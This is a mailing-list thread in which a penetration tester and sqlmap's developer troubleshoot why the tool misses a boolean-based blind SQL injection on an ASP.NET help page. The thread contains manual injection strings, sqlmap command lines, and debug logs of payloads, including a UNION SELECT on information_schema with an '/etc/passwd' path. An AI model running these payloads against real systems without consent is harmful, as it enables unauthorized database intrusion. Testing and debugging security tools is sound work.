OK. You're right in that the following lines in your dummy output
should produce discernable responses when tested against the
application:
PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
I've verified this manually. Thanks and I'll send you the traffic output file.
Cheers,
Alistair.
On Wed, Apr 29, 2015 at 4:57 PM, Miroslav Stampar
<miroslav.stam...@gmail.com> wrote:
> I would say that you screwed something up. Can you please send that traffic
> file I requested.
>
> Down below find a line that says: "[08:55:08] [PAYLOAD] PackageSelection'
> AND 1595=1103 AND 'cBLQ'='cBLQ". That is the proof that your claims are
> invalid.
>
> $ python sqlmap.py -u www.site.com/help/UserGuide.aspx?Sec=PackageSelection
> --dummy -v 3
> _
> ___ ___| |_____ ___ ___ {1.0-dev-03f32ae}
> |_ -| . | | | .'| . |
> |___|_ |_|_|_|_|__,| _|
> |_| |_| http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability and
> are not responsible for any misuse or damage caused by this program
>
> [*] starting at 08:55:05
>
> [08:55:05] [DEBUG] cleaning up configuration parameters
> [08:55:05] [DEBUG] setting the HTTP timeout
> [08:55:05] [DEBUG] creating HTTP requests opener object
> [08:55:05] [DEBUG] heuristically checking if the target is protected by some
> kind of WAF/IPS/IDS
> [08:55:05] [PAYLOAD] WVJJ=8692 AND 1=1 UNION ALL SELECT 1,2,3,table_name
> FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd
> [08:55:05] [DEBUG] setting match ratio for current parameter to 0.743
> [08:55:05] [INFO] testing if the target URL is stable. This can take a
> couple of seconds
> [08:55:06] [WARNING] target URL is not stable. sqlmap will base the page
> comparison on a sequence matcher. If no dynamic nor injectable parameters
> are detected, or in case of junk results, refer to user's manual paragraph
> 'Page comparison' and provide a string or regular expression to match on
> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
> [08:55:08] [INFO] searching for dynamic content
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.446
> [08:55:08] [CRITICAL] target URL is heavily dynamic. sqlmap is going to
> retry the request
> [08:55:08] [INFO] searching for dynamic content
> [08:55:08] [INFO] testing if GET parameter 'Sec' is dynamic
> [08:55:08] [PAYLOAD] 2485
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.867
> [08:55:08] [INFO] confirming that GET parameter 'Sec' is dynamic
> [08:55:08] [PAYLOAD] 8682
> [08:55:08] [INFO] GET parameter 'Sec' is dynamic
> [08:55:08] [PAYLOAD] PackageSelection)"'.)"").'
> [08:55:08] [WARNING] heuristic (basic) test shows that GET parameter 'Sec'
> might not be injectable
> [08:55:08] [PAYLOAD] PackageSelection'LcAd<'">Hovs
> [08:55:08] [INFO] testing for SQL injection on GET parameter 'Sec'
> [08:55:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [08:55:08] [PAYLOAD] PackageSelection) AND 4774=3078 AND (8643=8643
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.833
> [08:55:08] [PAYLOAD] PackageSelection) AND 1559=1559 AND (3186=3186
> [08:55:08] [PAYLOAD] PackageSelection AND 8581=4897
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.851
> [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559
> [08:55:08] [PAYLOAD] PackageSelection') AND 6273=6522 AND ('YHvu'='YHvu
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.554
> [08:55:08] [PAYLOAD] PackageSelection') AND 1559=1559 AND ('sTiQ'='sTiQ
> [08:55:08] [PAYLOAD] PackageSelection') AND 3601=4813 AND ('ParN'='ParN
> [08:55:08] [PAYLOAD] PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.745
> [08:55:08] [PAYLOAD] PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
> [08:55:08] [PAYLOAD] PackageSelection' AND 8619=5317 AND 'RtrE'='RtrE
> [08:55:08] [PAYLOAD] PackageSelection%' AND 3991=4465 AND '%'='
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.495
> [08:55:08] [PAYLOAD] PackageSelection%' AND 1559=1559 AND '%'='
> [08:55:08] [PAYLOAD] PackageSelection%' AND 5263=7541 AND '%'='
> [08:55:08] [PAYLOAD] PackageSelection AND 8168=8736-- pZYt
> [08:55:08] [DEBUG] setting match ratio for current parameter to 0.685
> [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559-- NfAy
> ...
>
> On Tue, Apr 28, 2015 at 3:15 PM, Alistair Johnson <amcljohn...@gmail.com>
> wrote:
>>
>> Hi Brandon,
>>
>> Thanks for your comment. Confirming that i've tried risk=3 with
>> level=5 with the same results. I've looked more closely at the
>> requests that sqlmap is sending to check if the parameter is
>> injectable. It is testing the Sec paramater with values such as:
>>
>> PackageSelection) AND 1477=7114
>> PackageSelection) AND 1631=1631
>> PackageSelection') AND 5603=7729
>> PackageSelection') AND 1631=1631
>> PackageSelection' AND 3943=9381
>> PackageSelection' AND 1631=1631
>> PackageSelection" AND 3324=4690
>> PackageSelection" AND 1631=1631
>> PackageSelection) AND 4734=6616 AND (6346=6346
>> PackageSelection)) AND 7350=9272 AND (8861=8861
>>
>> When in fact, i assume it would need to use logic like I used to get
>> distinguishable responses:
>>
>> PackageSelection (returns response A)
>> PackageSelection' AND '1'='1 (returns response A)
>> PackageSelection' AND '1'='2 (returns response B)
>>
>> In a nutshell, it doesn't appear to be trying single quotes and values
>> in the ' AND '1'='1 pattern. But i would have thought this is a pretty
>> typical format for checking boolean-based blind SQLi.
>>
>> Cheers,
>>
>> Alistair.
>>
>> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry
>> <bperry.volat...@gmail.com> wrote:
>> > It's a GET, so there wouldn't be a content type, unless I am mistaken.
>> >
>> > Alistair, have you tried --risk=3 with --level=5 yet?
>> >
>> > Sent from a phone
>> >
>> > On Apr 28, 2015, at 7:13 AM, Miroslav Stampar
>> > <miroslav.stam...@gmail.com>
>> > wrote:
>> >
>> > Can you please send the unredacted content of request.txt to my address?
>> >
>> > If not, then please at least send me the content of traffic file which
>> > you
>> > can obtain by just appending the "-t traffic.txt" to the regular
>> > sqlmap's
>> > run.
>> >
>> > Bye
>> >
>> > On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson
>> > <amcljohn...@gmail.com>
>> > wrote:
>> >>
>> >> Thanks for the quick reply.
>> >>
>> >> The contents of the request file are as follows:
>> >>
>> >> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
>> >> Host: <redacted>
>> >> Accept: */*
>> >> Accept-Language: en
>> >> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
>> >> x64; Trident/5.0)
>> >> Connection: close
>> >> Referer: <redacted>
>> >> Cookie: <redacted>
>> >>
>> >> I've redacted some of the details as it's not appropriate to draw
>> >> attention to an internet facing application's SQLi vulnerability.
>> >>
>> >> When providing the request file as part of the following command:
>> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
>> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
>> >> 'industries' -v 1
>> >>
>> >> sqlmap executes as normal but cannot identify (and therefore cannot
>> >> exploit) the boolean-based blind vulnerability which I've verified
>> >> manually.
>> >>
>> >> Thanks again,
>> >>
>> >> Al.
>> >>
>> >>
>> >> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar
>> >> <miroslav.stam...@gmail.com> wrote:
>> >> > And what is the content of request file?
>> >> >
>> >> > Bye
>> >> >
>> >> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson
>> >> > <amcljohn...@gmail.com>
>> >> > wrote:
>> >> >>
>> >> >> Hi sqlmappers,
>> >> >>
>> >> >> I'm a fairly experienced user of sqlmap having used it extensively
>> >> >> in
>> >> >> the past. I came across what appeared to pretty typical
>> >> >> boolean-based
>> >> >> blind SQLi in an application I'm (legally) testing. However, for the
>> >> >> first time, I'm unable to get sqlmap to recognise the parameter as
>> >> >> vulnerable to exploit it further. And as we know, manually
>> >> >> exploiting
>> >> >> blind SQLi is cumbersome to say the least.
>> >> >>
>> >> >> Here is a summary of the requests i've made to manually confirm the
>> >> >> vulnerability.
>> >> >>
>> >> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
>> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns
>> >> >> response
>> >> >> A)
>> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns
>> >> >> response
>> >> >> B)
>> >> >>
>> >> >> I've tried various sqlmap flags and thought the following command
>> >> >> would give me the best chance of success:
>> >> >>
>> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
>> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
>> >> >> 'industries' -v 1
>> >> >>
>> >> >> Note: the string 'industries' is text that appears in response A but
>> >> >> not response B.
>> >> >>
>> >> >> I've looked at the requests that sqlmap is sending in the background
>> >> >> (proxied through burp). It appears that it's attempting to exploit
>> >> >> this with the AND statement as it should but is not using single
>> >> >> quotes as per my example above.
>> >> >>
>> >> >> I'd appreciate any insight. If this is a shortcoming in sqlmap, i'd
>> >> >> be
>> >> >> more than happy to contribute some time to improve it so it can
>> >> >> identify injectable parameters such as these in the future.
>> >> >>
>> >> >> Thanks,
>> >> >>
>> >> >> Al.
>> >> >>
>> >> >>
>> >> >>
>> >> >>
>> >> >> ------------------------------------------------------------------------------
>> >> >> One dashboard for servers and applications across
>> >> >> Physical-Virtual-Cloud
>> >> >> Widest out-of-the-box monitoring support with 50+ applications
>> >> >> Performance metrics, stats and reports that give you Actionable
>> >> >> Insights
>> >> >> Deep dive visibility with transaction tracing using APM Insight.
>> >> >> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
>> >> >> _______________________________________________
>> >> >> sqlmap-users mailing list
>> >> >> sqlmap-users@lists.sourceforge.net
>> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >> >
>> >> >
>> >> >
>> >> >
>> >> > --
>> >> > Miroslav Stampar
>> >> > http://about.me/stamparm
>> >
>> >
>> >
>> >
>> > --
>> > Miroslav Stampar
>> > http://about.me/stamparm
>> >
>> >
>> > ------------------------------------------------------------------------------
>> > One dashboard for servers and applications across Physical-Virtual-Cloud
>> > Widest out-of-the-box monitoring support with 50+ applications
>> > Performance metrics, stats and reports that give you Actionable Insights
>> > Deep dive visibility with transaction tracing using APM Insight.
>> > http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
>> >
>> > _______________________________________________
>> > sqlmap-users mailing list
>> > sqlmap-users@lists.sourceforge.net
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
------------------------------------------------------------------------------
One dashboard for servers and applications across Physical-Virtual-Cloud
Widest out-of-the-box monitoring support with 50+ applications
Performance metrics, stats and reports that give you Actionable Insights
Deep dive visibility with transaction tracing using APM Insight.
http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
